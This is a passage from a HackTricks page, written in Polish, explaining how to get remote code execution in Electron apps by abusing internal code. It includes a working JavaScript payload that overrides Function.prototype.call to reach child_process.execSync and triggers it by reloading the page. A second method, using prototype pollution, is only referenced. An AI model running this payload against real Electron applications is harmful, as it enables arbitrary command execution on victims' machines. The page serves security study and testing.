HackTricks
Electron contextIsolation RCE via Electron internal code
Tip
Ucz się i ćwicz AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się i ćwicz Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcji!
- Dołącz do 💬 grupy Discord, grupy telegram, obserwuj @hacktricks_live na X/Twitter, albo sprawdź stronę LinkedIn i kanał YouTube.
- Dziel się hacking tricks, wysyłając PR do repozytoriów github HackTricks i HackTricks Cloud.
Example 1
Listener zdarzenia “exit” jest zawsze ustawiany przez kod wewnętrzny, gdy rozpoczyna się ładowanie strony. To zdarzenie jest emitowane tuż przed nawigacją:
process.on("exit", function () {
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
})
.png)
https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 – Już nie istnieje
Następnie przechodzi tutaj:
.png)
Gdzie “self” to obiekt procesu Node:
.png)
Obiekt procesu ma odniesienie do funkcji “require”:
process.mainModule.require
Ponieważ handler.call ma otrzymać obiekt procesu, możemy go nadpisać, aby wykonać dowolny kod:
<script>
Function.prototype.call = function (process) {
process.mainModule.require("child_process").execSync("calc")
}
location.reload() //Trigger the "exit" event
</script>
Przykład 2
Uzyskaj obiekt require z zanieczyszczenia prototypu. Z https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx–zq&index=81
Wyciekanie:
.png)
Eksploatacja:
.png)
Tip
Ucz się i ćwicz AWS Hacking:
Ucz się i ćwicz GCP Hacking:
Ucz się i ćwicz Az Hacking:Wsparcie HackTricks
- Sprawdź plany subskrypcji!
- Dołącz do 💬 grupy Discord, grupy telegram, obserwuj @hacktricks_live na X/Twitter, albo sprawdź stronę LinkedIn i kanał YouTube.
- Dziel się hacking tricks, wysyłając PR do repozytoriów github HackTricks i HackTricks Cloud.